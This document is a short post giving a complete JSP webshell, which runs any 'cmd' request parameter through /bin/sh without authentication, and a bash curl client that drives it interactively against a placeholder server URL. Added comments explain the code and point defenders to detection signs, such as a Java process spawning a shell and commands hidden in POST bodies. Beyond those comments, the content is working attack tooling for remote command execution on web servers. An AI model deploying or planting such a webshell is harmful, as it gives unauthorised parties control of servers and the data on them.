# JSP webshell


# cat shell.jsp
<%@page import="java.lang.*"%>
<%@page import="java.util.*"%>
<%@page import="java.io.*"%>
<%@page import="java.net.*"%>

<%
// Reads the "cmd" request parameter and, when it is present, runs it through
// /bin/sh and writes the command's standard output into the HTTP response.
// No authentication, authorisation or input validation is visible in this
// scriptlet: whoever can reach the page controls the command string.
String getcmd = request.getParameter("cmd");
if (getcmd != null) {
 //out.println("Command: " + getcmd + "<br>");
 // The whole parameter value is handed to "/bin/sh -c", so shell syntax in it
 // (pipes, redirects, ';') is interpreted by the shell.
 String[] cmd = {"/bin/sh", "-c", getcmd};
 // The child is spawned by the JVM serving this page and inherits its OS account.
 // For defenders: a servlet-container java process that is the parent of /bin/sh
 // is the process-creation event this line produces.
 Process p = Runtime.getRuntime().exec(cmd);
 // Handle to the child's stdin; it is never written to or closed below.
 OutputStream os = p.getOutputStream();
 // Only stdout is read; the child's stderr (p.getErrorStream()) is not consumed here.
 InputStream in = p.getInputStream();
 DataInputStream dis = new DataInputStream(in);
 // DataInputStream.readLine() is deprecated in the JDK (byte-to-char conversion is lossy).
 String disr = dis.readLine();
 //out.println("<pre>"); 
 // Each output line is written to the response as-is, with no HTML encoding.
 while ( disr != null ) {
  out.println(disr); 
  disr = dis.readLine(); 
 }
 //out.println("</pre>"); 
}
%>
# cat shell.sh
#!/bin/bash
# Interactive client for shell.jsp: prompts for a line, sends it as the "cmd"
# form field with curl, prints the response, and repeats until "exit" is typed.

# Keep this client's command history in a local file and load any earlier entries.
HISTFILE=./file_history
history -r

input=""

# The loop condition is tested before each read, so the literal line "exit"
# is still sent to the server once before the loop ends.
while [ "$input" != "exit" ]; do
 # -e enables readline editing (history recall) at the "> " prompt.
 read -e -p "> " input
 # $input is unquoted here, so it is word-split and glob-expanded before
 # being stored as a history entry.
 history -s $input
 # --data-urlencode makes this a POST with "cmd" in the request body, so a web
 # access log that records only the URL shows repeated POSTs to shell.jsp but
 # not the commands themselves. -k turns off TLS certificate verification.
 # VAR1/VALUE1, VAR2/VALUE2, DOMAIN and DIR are placeholders in the original post.
 curl -k --cookie 'VAR1=VALUE1' --cookie 'VAR2=VALUE2' --data-urlencode "cmd=$input" https://DOMAIN/DIR/shell.jsp
done

# Append this session's new history entries to ./file_history.
history -a
